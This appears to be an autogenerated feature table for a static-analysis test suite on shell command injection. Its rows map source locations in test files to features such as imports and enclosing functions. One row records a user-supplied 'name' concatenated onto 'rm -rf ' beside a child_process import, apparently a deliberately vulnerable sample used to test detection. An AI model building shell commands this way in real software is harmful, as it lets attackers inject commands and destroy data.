autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:22:4:25 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts:4:22:4:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:1:1:0 | this | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:1:1:0 | this | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:1:1:1 | dispatch | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:1:1:1 | dispatch | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:1:1:1 | dispatch | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:1:1:1 | module | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:1:1:1 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:1:1:1 | module | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:1:1:1 | require | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:1:1:1 | require | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:7:1:14 | dispatch | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:7:1:14 | dispatch | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:7:1:14 | dispatch | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:7:1:14 | dispatch | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:7:4:1 | dispatc ... ub"),\\n} | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:7:4:1 | dispatc ... ub"),\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:7:4:1 | dispatc ... ub"),\\n} | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:7:4:1 | dispatch | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:7:4:1 | dispatch | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:7:4:1 | dispatch | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:18:4:1 | {\\n GET ... ub"),\\n} | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:18:4:1 | {\\n GET ... ub"),\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:1:18:4:1 | {\\n GET ... ub"),\\n} | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:3:2:5 | GET | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:3:2:5 | GET | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:3:2:5 | GET | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:3:2:23 | GET: re ... ./bla") | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:3:2:23 | GET: re ... ./bla") | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:3:2:23 | GET: re ... ./bla") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:3:2:23 | GET: re ... ./bla") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:3:2:23 | GET: re ... ./bla") | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:3:2:23 | GET: re ... ./bla") | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:8:2:14 | require | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:8:2:14 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:8:2:14 | require | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:8:2:23 | exceptional return of require("./bla") | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:8:2:23 | exceptional return of require("./bla") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:8:2:23 | exceptional return of require("./bla") | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:8:2:23 | require("./bla") | assignedToPropName | GET | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:8:2:23 | require("./bla") | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:8:2:23 | require("./bla") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:8:2:23 | require("./bla") | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:16:2:22 | "./bla" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:16:2:22 | "./bla" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:16:2:22 | "./bla" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:16:2:22 | "./bla" | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:16:2:22 | "./bla" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:2:16:2:22 | "./bla" | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:3:3:6 | POST | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:3:3:6 | POST | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:3:3:6 | POST | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:3:3:27 | POST: r ... ubsub") | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:3:3:27 | POST: r ... ubsub") | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:3:3:27 | POST: r ... ubsub") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:3:3:27 | POST: r ... ubsub") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:3:3:27 | POST: r ... ubsub") | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:3:3:27 | POST: r ... ubsub") | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:9:3:15 | require | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:9:3:15 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:9:3:15 | require | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:9:3:27 | exceptional return of require("./subsub") | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:9:3:27 | exceptional return of require("./subsub") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:9:3:27 | exceptional return of require("./subsub") | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:9:3:27 | require("./subsub") | assignedToPropName | POST | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:9:3:27 | require("./subsub") | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:9:3:27 | require("./subsub") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:9:3:27 | require("./subsub") | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:17:3:26 | "./subsub" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:17:3:26 | "./subsub" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:17:3:26 | "./subsub" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:17:3:26 | "./subsub" | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:17:3:26 | "./subsub" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:3:17:3:26 | "./subsub" | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:1:6:6 | module | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:1:6:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:1:6:6 | module | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:1:6:14 | module.exports | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:1:6:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:1:6:14 | module.exports | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:1:6:18 | module.exports.foo | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:1:6:18 | module.exports.foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:1:6:18 | module.exports.foo | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:1:8:1 | module. ... ame);\\n} | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:1:8:1 | module. ... ame);\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:1:8:1 | module. ... ame);\\n} | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:8:6:14 | exports | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:8:6:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:8:6:14 | exports | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:16:6:18 | foo | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:16:6:18 | foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:16:6:18 | foo | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:6:21 | dispatch | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:6:21 | dispatch | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:6:21 | dispatch | enclosingFunctionBody | name type dispatch type name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:6:21 | dispatch | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:6:21 | dispatch | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:6:21 | this | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:6:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:6:21 | this | enclosingFunctionBody | name type dispatch type name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:6:21 | this | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:6:21 | this | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:8:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:8:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:8:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name type dispatch type name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:8:1 | 'arguments' object of anonymous function | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:8:1 | 'arguments' object of anonymous function | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:8:1 | exceptional return of anonymous function | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:8:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:8:1 | exceptional return of anonymous function | enclosingFunctionBody | name type dispatch type name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:8:1 | exceptional return of anonymous function | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:8:1 | exceptional return of anonymous function | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:8:1 | functio ... ame);\\n} | assignedToPropName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:8:1 | functio ... ame);\\n} | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:8:1 | functio ... ame);\\n} | contextSurroundingFunctionParameters | (name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:8:1 | functio ... ame);\\n} | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:8:1 | return of anonymous function | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:8:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:8:1 | return of anonymous function | enclosingFunctionBody | name type dispatch type name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:8:1 | return of anonymous function | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:22:8:1 | return of anonymous function | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:32:6:35 | name | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:32:6:35 | name | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:32:6:35 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:32:6:35 | name | contextSurroundingFunctionParameters | (name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:32:6:35 | name | enclosingFunctionBody | name type dispatch type name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:32:6:35 | name | enclosingFunctionBody | name type dispatch type name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:32:6:35 | name | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:32:6:35 | name | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:32:6:35 | name | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:32:6:35 | name | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:38:6:41 | type | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:38:6:41 | type | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:38:6:41 | type | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:38:6:41 | type | contextSurroundingFunctionParameters | (name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:38:6:41 | type | enclosingFunctionBody | name type dispatch type name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:38:6:41 | type | enclosingFunctionBody | name type dispatch type name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:38:6:41 | type | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:38:6:41 | type | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:38:6:41 | type | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:6:38:6:41 | type | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:3:7:10 | dispatch | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:3:7:10 | dispatch | contextSurroundingFunctionParameters | (name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:3:7:10 | dispatch | enclosingFunctionBody | name type dispatch type name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:3:7:10 | dispatch | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:3:7:10 | dispatch | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:3:7:16 | dispatch[type] | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:3:7:16 | dispatch[type] | contextSurroundingFunctionParameters | (name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:3:7:16 | dispatch[type] | enclosingFunctionBody | name type dispatch type name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:3:7:16 | dispatch[type] | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:3:7:16 | dispatch[type] | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:3:7:22 | dispatch[type](name) | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:3:7:22 | dispatch[type](name) | contextSurroundingFunctionParameters | (name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:3:7:22 | dispatch[type](name) | enclosingFunctionBody | name type dispatch type name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:3:7:22 | dispatch[type](name) | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:3:7:22 | dispatch[type](name) | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:3:7:22 | exceptional return of dispatch[type](name) | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:3:7:22 | exceptional return of dispatch[type](name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:3:7:22 | exceptional return of dispatch[type](name) | enclosingFunctionBody | name type dispatch type name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:3:7:22 | exceptional return of dispatch[type](name) | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:3:7:22 | exceptional return of dispatch[type](name) | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:12:7:15 | type | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:12:7:15 | type | contextSurroundingFunctionParameters | (name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:12:7:15 | type | enclosingFunctionBody | name type dispatch type name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:12:7:15 | type | enclosingFunctionName | foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:12:7:15 | type | fileImports | ./bla ./subsub | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:18:7:21 | name | CalleeFlexibleAccessPath | dispatch.? | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:18:7:21 | name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:18:7:21 | name | contextFunctionInterfaces | foo(name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:18:7:21 | name | contextSurroundingFunctionParameters | (name, type) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:18:7:21 | name | enclosingFunctionBody | name type dispatch type name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib4/index.js:7:18:7:21 | name | enclosingFunctionName | foo | +| 